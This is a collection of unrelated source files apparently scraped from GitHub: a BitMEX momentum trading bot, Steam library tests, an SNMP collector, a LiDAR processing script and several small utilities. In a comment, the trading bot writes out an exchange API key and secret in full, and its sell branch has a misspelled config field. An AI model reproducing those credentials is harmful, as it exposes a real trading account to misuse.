ema_result.sma_mean - self.config.Multiplier * math.sqrt(ema_result.sma_variance)\n upper1 = ema_result.sma_mean + 1.9 * math.sqrt(ema_result.sma_variance)\n lower1 = ema_result.sma_mean - 1.9 * math.sqrt(ema_result.sma_variance)\n significance = abs((ema_result.current_value - ema_result.sma_mean) / math.sqrt(ema_result.sma_variance)) if ema_result.sma_variance != 0 else 0\n sma_variance = ema_result.sma_variance\n self.publish_result(MomentumIndicatorResult(midpoint_price=ema_result.current_value, best_bid=ema_result.best_bid, best_ask=ema_result.best_ask, momentum=-1000,\n significance=significance, sma_variance=sma_variance, upper=upper, lower=lower, upper1=upper1, lower1=lower1))\n\n\n@dataclass(frozen=True)\nclass WindowedPairNodeConfig:\n __slots__ = ('node_config', 'n', 'n2')\n\n node_config: Any\n n: int\n n2: int\n\n def __post_init__(self):\n assert_positive_integer(self.n)\n assert_positive_integer(self.n2)\n\n\nclass WindowedPairNode(Node[WindowedPairNodeConfig, tuple[NRT, NRT]]):\n __slots__ = ('values',)\n\n def __init__(self, engine: 'Engine', config: WindowedPairNodeConfig) -> None:\n super().__init__(engine, config)\n assert config.n2 > config.n\n self.values: deque[NRT] = deque(maxlen=config.n2)\n engine.subscribe_node_result(config.node_config, self.handle_value)\n\n def handle_value(self, value: NRT):\n self.values.append(value)\n if len(self.values) == self.values.maxlen:\n self.publish_result((value, self.values[self.values.maxlen - self.config.n], self.values[0]))\n\n\n################################################################################\n# execution dirty workaround config\n################################################################################\n# MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD = 2.1\n# VARIANCE_THERESHOLD = 1.8\n# Multiplier = 2.1\n\n# symbol0 = 'LTCUSDT'\n# ordType0 = 'Limit'\n# StopLoss = 0.02\n# orderQty0 = 12000\n# bitmex_api_key = 'ajdbjr4a_OyzPotZQqxkJW47'\n# bitmex_api_secret = '_P4Av8fzRxA1w4moGPwylXFGvYwe_hNpvqZROB_Fu5pCJGky'\n# client = bitmex.bitmex(test=False, api_key=bitmex_api_key, api_secret=bitmex_api_secret)\n################################################################################\n\n@dataclass\nclass MomentumIndicatorHistory:\n history: list[MomentumIndicatorResult]\n timestamps: list[float]\n\n def record(self, momentum_indicator_result: MomentumIndicatorResult) -> int:\n self.history.append(momentum_indicator_result)\n self.timestamps.append(time.time())\n return len(self.history) - 1\n\n def query_history_upper_or_lower(self, start_index: int, end_index: int = -1) -> Optional[bool]:\n for cur_index in range(start_index, end_index, -1):\n momentum: MomentumIndicatorResult = self.history[cur_index]\n if momentum.midpoint_price > momentum.upper1:\n return True\n elif momentum.midpoint_price < momentum.lower1:\n return False\n return None\n\n\n@dataclass(frozen=True)\nclass MomentumSignalNodeConfig:\n __slots__ = ('half_life', 'threshold', 'MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD', 'VARIANCE_THERESHOLD',\n 'Multiplier', 'symbol0', 'ordType0', 'StopLoss', 'orderQty0', 'bitmex_api_key', 'bitmex_api_secret',\n 'is_live')\n\n half_life: int\n threshold: float\n\n MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD: float\n VARIANCE_THERESHOLD: float\n Multiplier: float\n\n symbol0: str\n ordType0: str\n StopLoss: float\n orderQty0: int\n bitmex_api_key: str\n bitmex_api_secret: str\n is_live: bool\n\n def __post_init__(self):\n assert_positive_integer(self.half_life)\n assert_positive_real(self.threshold)\n\n\nclass MomentumSignalNode(Node[MomentumSignalNodeConfig, Signal]):\n __slots__ = ('client', 'tracking_map', 'history', 'last_query_index')\n\n def __init__(self, engine: 'Engine', config: MomentumSignalNodeConfig) -> None:\n super().__init__(engine, config)\n self.client = bitmex.bitmex(test=not config.is_live, api_key=config.bitmex_api_key, api_secret=config.bitmex_api_secret)\n\n momentum_indicator_node_config = MomentumIndicatorNodeConfig(half_life=config.half_life, Multiplier=config.Multiplier)\n windowed_pair_node_config = WindowedPairNodeConfig(node_config=momentum_indicator_node_config, n=2, n2=config.half_life + 1)\n engine.subscribe_node_result(windowed_pair_node_config, self.handle_momenta)\n self.tracking_map: OrderedDict[str, str] = OrderedDict()\n self.history = MomentumIndicatorHistory([], [])\n self.last_query_index = -1\n\n def handle_momenta(self, momenta: tuple[MomentumIndicatorResult, MomentumIndicatorResult, MomentumIndicatorResult]):\n (current_momentum, previous_momentum, really_previous_momentum) = momenta\n # record history\n record_index = self.history.record(current_momentum)\n momentum = (current_momentum.momentum / previous_momentum.momentum) if previous_momentum.momentum != 0 else 0\n varRatio = (current_momentum.sma_variance) / (really_previous_momentum.sma_variance) if really_previous_momentum.sma_variance != 0 else 0\n partial_message = f'[Current (MPP, upper, lower, significance, varRatio) is ({current_momentum.midpoint_price}, {current_momentum.upper}, {current_momentum.lower}, {current_momentum.significance}, {varRatio}).]'\n # if not (current_momentum.significance > MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD and previous_momentum.significance > MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD):\n positions = self.client.Position.Position_get(filter=json.dumps({'symbol': self.config.symbol0})).result()[0] # to get 'isOpen', 'currentQty'\n positions = positions[0] if len(positions) > 0 else {'currentQty': 0}\n\n if current_momentum.midpoint_price < current_momentum.lower:\n if (current_momentum.significance > self.config.MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD and varRatio < self.config.VARIANCE_THERESHOLD):\n logger.info(f'{partial_message}: BUY signal!')\n self.publish_result(Signal.BUY)\n signal = Signal.BUY\n if positions['currentQty'] == 0:\n # CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_bid).result()\n StopBuy = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_bid * (1 - self.config.StopLoss), 1), execInst='LastPrice').result()\n self.cancel_by_status(NewOrder)\n\n self.place_order(StopBuy[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Buy order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n\n elif positions['currentQty'] < 0:\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-positions['currentQty'] + signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_bid).result()\n StopBuy = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_bid * (1 - self.config.StopLoss), 1), execInst='LastPrice').result()\n\n self.place_order(StopBuy[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Buy order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n elif positions['currentQty'] < 0:\n logger.info(f'{partial_message}: CLOSE signal!')\n Closeposition = self.client.Order.Order_closePosition(symbol=self.config.symbol0, price=current_momentum.best_bid).result()\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n\n elif current_momentum.midpoint_price > current_momentum.upper:\n if (current_momentum.significance > self.config.MOMENTUM_SIGNAL_SIGNIFICANCE_THRESHOLD and varRatio < self.config.VARIANCE_THERESHOLD):\n logger.info(f'{partial_message}: SELL signal!')\n self.publish_result(Signal.SELL)\n signal = Signal.SELL\n if positions['currentQty'] == 0:\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=signal * self.config.orderQty0, ordType=self.config.ordType0, price=current_momentum.best_ask).result()\n StopSell = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_ask * (1 + self.config.StopLoss), 1), execInst='LastPrice').result()\n\n self.place_order(StopSell[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} market order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n\n elif positions['currentQty'] > 0:\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n NewOrder = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-positions['currentQty'] + signal * self.config.rderQty0, ordType=self.config.ordType0, price=current_momentum.best_ask).result()\n StopSell = self.client.Order.Order_new(symbol=self.config.symbol0, orderQty=-signal * self.config.orderQty0, ordType='Stop', stopPx=round(current_momentum.best_ask * (1 + self.config.StopLoss), 1), execInst='LastPrice').result()\n\n self.place_order(StopSell[0]['orderID'], NewOrder[0]['orderID'])\n logger.info(f'Create {signal.name} Sell order of orderID {NewOrder[0][\"orderID\"][0:7]} and orderQty is {NewOrder[0][\"orderQty\"]}')\n elif positions['currentQty'] > 0:\n logger.info(f'{partial_message}: CLOSE signal!')\n Closeposition = self.client.Order.Order_closePosition(symbol=self.config.symbol0, price=current_momentum.best_ask).result()\n CancelOrders = self.cancel_by_symbol(self.config.symbol0)\n\n elif current_momentum.lower1 <= current_momentum.midpoint_price <= current_momentum.upper1:\n logger.info(f'{partial_message}: midpoint is between lower1 and upper1!' +\n f'[midpoint:{current_momentum.midpoint_price},lower1:{current_momentum.lower1},upper1:{current_momentum.upper1}]')\n is_upper = self.history.query_history_upper_or_lower(record_index - 1, self.last_query_index)\n self.last_query_index = record_index - 1\n if is_upper is not None:\n # cancel buy\n if is_upper:\n logger.info(f'{partial_message}: The midpoint price was reduced from above upper1 to below upper1.Then cancel BUY orders.')\n self.cancel_by_symbol(self.config.symbol0, orderQty=Signal.BUY * self.config.orderQty0, ordType=self.config.ordType0)\n # cancel sell\n else:\n logger.info(f'{partial_message}: The midpoint price went up from below lower1 to above lower1.Then cancel SELL orders.')\n self.cancel_by_symbol(self.config.symbol0, orderQty=Signal.SELL * self.config.orderQty0, ordType=self.config.ordType0)\n else:\n logger.info(f'{partial_message}: Historical midpoint price are all between lower1 and upper1. There\\'s no need to cancel orders.')\n\n else:\n logger.info(f'{partial_message}: No signal (price within threshold).')\n return\n\n def cancel_by_status(self, order):\n if self.client.Order.Order_getOrders(filter=json.dumps({'orderID': order[0]['orderID']})).result()[0][0]['ordStatus'] == 'Filled':\n self.cancel_by_symbol(order[0]['symbol'], orderQty=order[0]['orderQty'], ordType=order[0]['ordType'])\n print(f'previous Stop orders for {order[0][\"side\"]} Limit orders canceled')\n\n def cancel_by_symbol(self, symbol_in: str, **filter_dict) -> list:\n filter_dict['open'] = True\n orders, resp = self.client.Order.Order_getOrders(symbol=symbol_in, filter=json.dumps(filter_dict)).result()\n if isinstance(orders, list):\n if len(orders) == 0:\n logger.warning('No order should be cancel')\n return []\n order_ids = []\n for order in orders:\n order_ids.append(order['orderID'])\n order_ids += self.get_associated_order_id(order['orderID'])\n cancelled = self.client.Order.Order_cancel(orderID=json.dumps(order_ids)).result()[0]\n logger.info('Cancel orders success')\n return cancelled\n else:\n logger.error(f'Query order before cancel failed.{filter_dict}')\n\n def place_order(self, associated_order_id: str, man_order_id: str):\n \"\"\"\n\n :param associated_order_id: stop order id\n :param man_order_id: main order id\n :return:\n \"\"\"\n self.tracking_map[associated_order_id] = man_order_id\n\n def remove_associated_orders_belongs_to_main_order_id(self, main_order_id: str):\n for (k, v) in self.tracking_map.items():\n if v == main_order_id:\n self.tracking_map[k] = 'FINISHED'\n\n def is_order_already_associated(self, associated_order_id: str) -> bool:\n return associated_order_id in self.tracking_map\n\n def get_main_order_id(self, associated_order_id: str) -> str:\n return self.tracking_map.get(associated_order_id)\n\n def get_associated_order_id(self, main_order_id: str) -> list[str]:\n ret: list[str] = []\n for (k, v) in self.tracking_map.items():\n if v == main_order_id:\n ret.append(k)\n return ret\n\n\n@dataclass(frozen=True)\nclass MomentumStrategyConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('half_life', 'threshold', 'per_trade_usage', 'signal_execute_config')\n\n # Look-back duration (in seconds).\n half_life: int\n # Ratio of current momentum to look-back momentum above which a buy or sell signal may be emitted.\n threshold: float\n # Percentage of available balance (including margin) to use when a buy or sell signal is emitted.\n per_trade_usage: float\n\n signal_execute_config: dict[str, int | str | bool]\n\n def __post_init__(self) -> None:\n assert_positive_integer(self.half_life)\n assert_positive_real(self.threshold)\n assert_positive_percentage(self.per_trade_usage)\n\n\nclass MomentumStrategy:\n __slots__ = ()\n\n def __init__(self, engine: Engine, config: MomentumStrategyConfig) -> None:\n engine.register_node_type(MomentumIndicatorNodeConfig, MomentumIndicatorNode)\n engine.register_node_type(WindowedPairNodeConfig, WindowedPairNode)\n engine.register_node_type(MomentumSignalNodeConfig, MomentumSignalNode)\n\n signal_execute_config = config.signal_execute_config\n signal_execute_config.update(half_life=config.half_life, threshold=config.threshold)\n engine.get_node(MomentumSignalNodeConfig(**signal_execute_config)) # TODO\n\n\n########################################################################################################################\n# Execution\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass WorkTheBidExecutionConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('max_depth', 'min_trade_lots', 'order_ratio', 'renew_after_duration', 'renew_after_trade_lots')\n\n # Maximum order book depth (in levels) to which orders can be placed.\n max_depth: int\n # Minimum trade size (in lots) per level.\n min_trade_lots: int\n # Target percentage of volume at the level the order will be placed. This will be rounded down to the nearest lot.\n # This may then be adjusted up to the minimum trade size, or down if we're on our last order.\n order_ratio: float\n # Duration (in seconds) that can elapse with an order not being completely fulfilled, after which all open orders\n # will be re-evaluated.\n renew_after_duration: float\n # Volume of trades (in lots) that can elapse with an order not being completely fulfilled, after which all open\n # orders will be re-evaluated.\n renew_after_trade_lots: int\n\n def __post_init__(self) -> None:\n assert_positive_integer(self.max_depth)\n assert_positive_integer(self.min_trade_lots)\n assert_positive_percentage(self.order_ratio)\n assert_positive_real(self.renew_after_duration)\n assert_positive_integer(self.renew_after_trade_lots)\n\n\n########################################################################################################################\n# Bootstrap\n########################################################################################################################\n\ndef main() -> None:\n (verbosity, log_file, engine_config, exchange_config, strategy_config, execution_config) = get_config()\n init_logging(verbosity, log_file)\n\n engine = Engine(engine_config)\n exchange = BitmexExchange(engine, exchange_config)\n strategy = MomentumStrategy(engine, strategy_config)\n engine.run()\n\n\ndef get_config() -> tuple[int, Optional[Path], EngineConfig, BitmexExchangeConfig, MomentumStrategyConfig, WorkTheBidExecutionConfig]:\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', nargs='?', default='config.json', type=argparse.FileType('r'))\n parser.add_argument('--verbose', '-v', action='count', default=0, dest='verbosity')\n parser.add_argument('--log-file', nargs='?', default='record.log', type=Path) # output log content to ./record.log by default\n args = parser.parse_args()\n\n config = json.load(args.config)\n engine_config = EngineConfig(\n symbol=config['symbol'],\n base_currency=config['baseCurrency'],\n quote_currency=config['quoteCurrency'],\n account_currency=config['accountCurrency'],\n settlement_currency=config['settlementCurrency'],\n leverage=config['leverage'],\n position_currency=config['positionCurrency'],\n )\n exchange_config = BitmexExchangeConfig(\n is_live=config['exchange']['isLive'],\n api_key=config['exchange']['apiKey'],\n api_secret=getpass(f'''Enter BitMEX API key secret (for ID `{config['exchange']['apiKey']}`): ''') # ask for secret input from terminal\n # api_secret=config['exchange']['apiSecret']\n )\n strategy_config = MomentumStrategyConfig(\n half_life=config['strategy']['halfLife'],\n threshold=config['strategy']['threshold'],\n per_trade_usage=config['strategy']['perTradeUsage'],\n signal_execute_config=config['strategy']['signal_execute_config'],\n )\n execution_config = WorkTheBidExecutionConfig(\n max_depth=config['execution']['maxDepth'],\n min_trade_lots=config['execution']['minTradeLots'],\n order_ratio=config['execution']['orderRatio'],\n renew_after_duration=config['execution']['renewAfterDuration'],\n renew_after_trade_lots=config['execution']['renewAfterTradeLots'],\n )\n\n verbosity = assert_non_negative_integer(args.verbosity)\n return (verbosity, args.log_file, engine_config, exchange_config, strategy_config, execution_config)\n\n\ndef init_logging(verbosity: int, log_file: Optional[Path]) -> None:\n formatter = logging.Formatter('[{asctime}] [{levelname:<8s}] [{threadName:s}] [{funcName:s}]: {message:s}', style='{')\n\n root_stream_handler = logging.StreamHandler()\n root_stream_handler.setLevel(logging.DEBUG)\n root_stream_handler.setFormatter(formatter)\n\n if log_file:\n root_file_handler = logging.FileHandler(filename=log_file, mode='a', encoding='utf-8')\n root_file_handler.setLevel(logging.DEBUG)\n root_file_handler.setFormatter(formatter)\n\n # By default, log `WARNING`s and higher.\n # If `-v`, log `INFO`s and higher.\n # If `-vv`, log everything for the core application, and `INFO`s and higher for everything else.\n # If `-vvv`, log everything.\n logger.setLevel(logging.DEBUG if verbosity == 2 else logging.NOTSET)\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG if verbosity >= 3 else logging.INFO if verbosity >= 1 else logging.WARNING)\n root_logger.addHandler(root_stream_handler)\n if log_file:\n root_logger.addHandler(root_file_handler)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LeoJhonSong/bitmex-quant","sub_path":"MeanReversionLimitClose.py","file_name":"MeanReversionLimitClose.py","file_ext":"py","file_size_in_byte":43401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14580503614","text":"from unittest import TestCase\nfrom picker_lib import Distributor\nfrom steam import WebAPI\n\n\nclass Steam(Distributor):\n def __init__(self):\n super().__init__()\n self.steam_id = 0\n self.setup_connection()\n\n def setup_connection(self):\n self.api = WebAPI(key=self.credentials['web_api_key'])\n data = self.api.ISteamUser.ResolveVanityURL(\n vanityurl=self.credentials['user_id']\n )\n self.steam_id = data['response']['steamid']\n self.connection_alive = True\n\n def load_library_with_games(self):\n if self.connection_alive:\n self.library.games = {}\n # web call: get list of games, and their played status\n data = self.api.IPlayerService.GetOwnedGames(\n steamid=self.steam_id,\n include_appinfo=1,\n include_played_free_games=1,\n appids_filter=None\n )\n steam_game_list = data['response']['games']\n for game in steam_game_list:\n self.add_game(game['name'], True if game['playtime_forever'] > 0 else False)\n\n\nclass SteamDistributorTests(TestCase):\n @classmethod\n def setUpClass(cls):\n import warnings\n warnings.filterwarnings('ignore', 'unclosed*', ResourceWarning)\n\n def setUp(self):\n self.stm = Steam()\n\n def test_created_steam_obj(self):\n self.assertEqual('steam', self.stm.name)\n\n def test_check_connection_and_get_steam_id(self):\n self.assertEqual(True, self.stm.connection_alive)\n self.assertIsNot(0, self.stm.steam_id)\n\n def test_load_library(self):\n self.assertEqual(0, len(self.stm.get_titles_from_library()))\n self.stm.load_library_with_games()\n self.assertIsNot(0, len(self.stm.get_titles_from_library()))\n","repo_name":"chisaipete/gamepicker","sub_path":"dist_steam.py","file_name":"dist_steam.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13873512499","text":"import sys\r\n\r\nN, M, K = map(int, input().split())\r\narr = list(map(int, sys.stdin.readline().split()))\r\n\r\nresult = 0\r\ntotalSum = 0\r\narr.sort(reverse=True)\r\n\r\n#sol1\r\nwhile M >totalSum:\r\n r = 0\r\n while K > r and M > totalSum:\r\n result += arr[0]\r\n totalSum+=1\r\n r +=1\r\n\r\n result += arr[1]\r\n totalSum+=1\r\n\r\nprint(result)\r\n\r\n#sol2\r\nresult = 0\r\nfirst = arr[0]\r\nsecond = arr[1]\r\n\r\ncount = int(M/(K+1) * K)\r\ncount += int(M % (K+1))\r\n\r\nresult += count * first\r\nresult += (M-count) * second\r\n\r\nprint(result)\r\n\r\n\r\n\r\n\r\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"그리디/큰수의법칙.py","file_name":"큰수의법칙.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272773494","text":"# coding: utf-8\n# Baptiste Feldmann\nimport os\n\nimport numpy as np\n\nimport plateforme_lidar as pl\n\nworkspace = r'G:\\RENNES1\\Loire_totale_automne2019\\Loire3_Checy-Saint-Dye\\05-Traitements'+'//'\nC2_filename = \"C2_ground_thin_1m.laz\"\nC3_filename = \"C3_ground_thin_1m.laz\"\n\nCC_opt = ['standard', 'LAS', \"Loire45-1\"]\n\n# compute raw bathymetry\nfilterVert = [-4, -0.3]\nquery = tools.cloudcompare.open_file(CC_opt, [workspace + C3_filename, workspace + C2_filename])\ntools.cloudcompare.c2c_dist(query)\nos.remove(tools.cloudcompare.last_file(workspace + C2_filename[0:-4] + \"_20*.laz\"))\ntools.cloudcompare.last_file(workspace + C3_filename[0:-4] + \"_C2C_DIST_*.laz\", C3_filename[0:-4] + \"_C2C.laz\")\n\nC3_data = tools.lastools.read(workspace + C3_filename[0:-4] + \"_C2C.laz\", True)\noutData = tools.lastools.filter_las(C3_data,\n np.logical_and(C3_data.c2c_absolute_distances_z > filterVert[0],\n C3_data.c2c_absolute_distances_z < filterVert[1])\n )\n\ndensity = pl.calculs.compute_density(outData.XYZ, radius=5)\noutData = tools.lastools.filter_las(outData, density > 15)\n\ntools.lastools.WriteLAS(workspace + C3_filename[0:-4] + \"_rawbathy.laz\", outData)\n\nos.remove(workspace+C3_filename[0:-4]+\"_C2C.laz\")\ndel C3_data\ndel outData\n\n# compute water surface\nfilterNormal = 1\nfilterDist = 25\nfilterVert = [0.25, 3.5]\n\ntools.cloudcompare.compute_normals_dip(workspace + C2_filename, CC_opt, 2)\ntools.cloudcompare.last_file(workspace + C2_filename[0:-4] + \"_20*.laz\", C2_filename[0:-4] + \"_normals.laz\")\nquery = tools.cloudcompare.open_file(CC_opt,\n [workspace + C2_filename[0:-4] + \"_normals.laz\",\n workspace + C3_filename[0:-4] + \"_rawbathy.laz\"])\ntools.cloudcompare.c2c_dist(query)\n\nos.remove(tools.cloudcompare.last_file(workspace + C3_filename[0:-4] + \"_rawbathy_20*.laz\"))\ntools.cloudcompare.last_file(workspace + C2_filename[0:-4] + \"_normals_C2C_DIST_*.laz\",\n C2_filename[0:-4] + \"_normals_C2C.laz\")\n\nC2_data = tools.lastools.read(workspace + C2_filename[0:-4] + \"_normals_C2C.laz\", True)\n\nselect1 = C2_data.dip_degrees < filterNormal\nselect2 = (C2_data.c2c_absolute_distances_x**2 + C2_data.c2c_absolute_distances_y**2)**0.5 < filterDist\nselect3 = np.logical_and(C2_data.c2c_absolute_distances_z > filterVert[0],\n C2_data.c2c_absolute_distances_z < filterVert[1])\nselect_all = np.logical_and(np.logical_and(select1, select2),\n select3)\n\noutData = tools.lastools.filter_las(C2_data, select_all)\ndensity = pl.calculs.compute_density(outData.XYZ, radius=5)\noutData = tools.lastools.filter_las(outData, density > 15)\n\ntools.lastools.WriteLAS(workspace + C2_filename[0:-4] + \"_watersurface.laz\", outData)\n\nos.remove(workspace+C2_filename[0:-4]+\"_normals.laz\")\nos.remove(workspace+C2_filename[0:-4]+\"_normals_C2C.laz\")\n","repo_name":"p-leroy/lidar_platform","sub_path":"scripts_bfe/C2_extractWaterSurface.py","file_name":"C2_extractWaterSurface.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"8802467003","text":"#Read a file\nwith open(\"javascript.txt\", mode=\"r\") as s_file:\n words_all = []\n for line in s_file.readlines():\n words = line.strip().split(\" \")\n words_all += words\n\n\n unique_words = set(words_all)\n print(len(words_all))\n print(len(unique_words))\n \n with open(\"unique_words.txt\", mode = \"w\") as writer_file:\n for item in sorted(unique_words):\n writer_file.write(item)\n writer_file.write(\"\\n\")\n\nprint(\"Finished\")","repo_name":"manwar16/pythonPractice","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13999296898","text":"from django import template\n\nregister = template.Library()\n\n@register.filter\ndef wtf(mapping):\n glml_id = mapping['glml_id']\n from glml.web.models import ANSWER_STUDENT_ID, ANSWER_STUDENT_NAME, District, GRADES, SchoolID, Year \n year = Year.get_current_year()\n try:\n district = District.objects.get(glml_id=glml_id[0], year=year)\n try:\n school = SchoolID.objects.get(glml_id=glml_id[1:3], district=district).school.name\n if school == ANSWER_STUDENT_NAME:\n assert False\n except SchoolID.DoesNotExist:\n school = u'?'\n district = district.glml_id\n if district == ANSWER_STUDENT_ID[0]:\n assert False\n except District.DoesNotExist:\n district = u'?'\n try:\n grade = dict(zip(GRADES.values(), GRADES.keys()))[int(glml_id[3])]\n except:\n grade = u'?'\n if grade == 11:\n grade = u'n %s' % grade\n else:\n grade = u' %s' % grade\n return u'%s, row %s (seems like a%sth grader at %s in district %s)' % (glml_id,\n mapping['row'],\n grade,\n school,\n district)\n\n@register.filter\ndef hash(dictionary, key):\n return dictionary[key]\n\n@register.filter\ndef date_string(date):\n from glml.utils import date_string\n return date_string(date)\n","repo_name":"toddobryan/glml","sub_path":"orig-python-django-src/glml/web/templatetags/glmltags.py","file_name":"glmltags.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24756999705","text":"\"\"\" SNMP components module\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\nimport logging\nfrom collections import defaultdict\nfrom pysnmp.hlapi import getCmd, nextCmd, ObjectIdentity, ObjectType\nfrom pysnmp.hlapi import SnmpEngine, CommunityData, UdpTransportTarget, ContextData\nfrom collector.celery import app, mib_view\n\n\ndef get_var_binds(oids):\n \"\"\" Return list of ObjectType class instances\n \"\"\"\n var_binds = []\n\n for oid in oids:\n if isinstance(oid, (tuple, list)):\n ident = ObjectIdentity(*oid)\n if isinstance(oid, str):\n ident = ObjectIdentity(oid)\n\n var_binds.append(ObjectType(ident))\n\n return var_binds\n\n\n@app.task(name='snmp.snmp_get', ignore_result=True)\ndef snmp_get(oids, hostname, community='public'):\n \"\"\" PySNMP GET implementation\n \"\"\"\n response = defaultdict(dict)\n\n session = getCmd(SnmpEngine(),\n CommunityData(community, mpModel=1),\n UdpTransportTarget((hostname, 161), timeout=3, retries=1),\n ContextData(),\n *get_var_binds(oids),\n lookupMib=False)\n\n for error_indication, error_status, error_index, var_binds in session:\n if error_indication:\n logging.warning('%s - %s', hostname, error_indication)\n break\n\n if error_status:\n logging.warning('%s - %s at %s',\n hostname,\n error_status.prettyPrint(),\n error_index and var_binds[int(error_index)-1][0] or '?')\n break\n\n for var_name, var_value in var_binds:\n (_, object_name, object_id) = mib_view.getNodeLocation(var_name)\n\n response[object_id.prettyPrint()].update({object_name: var_value.prettyPrint()})\n\n return dict(response)\n\n\n@app.task(name='snmp.snmp_walk', ignore_result=True)\ndef snmp_walk(oids, hostname, community='public'):\n \"\"\" PySNMP WALK implementation\n \"\"\"\n response = defaultdict(dict)\n\n session = nextCmd(SnmpEngine(),\n CommunityData(community, mpModel=1),\n UdpTransportTarget((hostname, 161), timeout=3, retries=1),\n ContextData(),\n *get_var_binds(oids),\n lexicographicMode=False,\n lookupMib=False)\n\n for error_indication, error_status, error_index, var_binds in session:\n if error_indication:\n logging.warning('%s - %s', hostname, error_indication)\n break\n\n if error_status:\n logging.warning('%s - %s at %s',\n hostname,\n error_status.prettyPrint(),\n error_index and var_binds[int(error_index)-1][0] or '?')\n break\n\n for var_name, var_value in var_binds:\n (_, object_name, object_id) = mib_view.getNodeLocation(var_name)\n\n response[object_id.prettyPrint()].update({object_name: var_value.prettyPrint()})\n\n return dict(response)\n","repo_name":"hramcovdv/collector2","sub_path":"snmp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31514532498","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\n\nURL = \"https://www.screener.in/screens/234/bluest-of-the-blue-chips/\"\nheaders= {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}\n\n\npage = requests.get(URL, headers=headers)\n\nsoup1 = BeautifulSoup(page.content, \"html.parser\")\n\nsoup2 = BeautifulSoup(soup1.prettify(), \"html.parser\")\n\ntable = soup2.find('table',class_ = 'data-table text-nowrap striped mark-visited').find_all('tr')\n\nprint(table[1])\n\n# Create a Timestamp for your output to track when data was collected\n\nimport datetime\n\ntoday = datetime.date.today()\n\nprint(today)\n\nname=\"Spaj Industries\"\nprice=1000\nmarketcap=15000\nheader= ['Date','Company Name', 'Price', 'Market Cap']\ndata=[today, name, price, marketcap]\n\nwith open('BlueChipDataset.csv', 'w', newline='', encoding='UTF8') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n writer.writerow(data)\nimport pandas as pd\n\ndf = pd.read_csv(r'D:\\User Data\\Desktop\\PycharmProjects\\MEDUSA\\BlueChipDataset.csv')\nfor t in table[1:15]:\n name = t.find('a').get_text().strip()\n xyz = t.find_all('td')\n price = xyz[2].get_text().strip()\n marketcap = xyz[4].get_text().strip()\n data = [today, name, price, marketcap]\n with open('BlueChipDataset.csv', 'a+', newline='', encoding='UTF8') as f:\n writer = csv.writer(f)\n writer.writerow(data)\n\nprint(df)","repo_name":"shubhking51/Attack-Titan-Scraper","sub_path":"BlueChipWeb.py","file_name":"BlueChipWeb.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34784340415","text":"from rotarran.application.settings.paths import paths_setting\n\n\ndef make_settings(settings, paths):\n project(settings, paths)\n paths_setting(settings, paths)\n database(settings, paths)\n logger(settings, paths)\n debug(settings, paths)\n\n\ndef 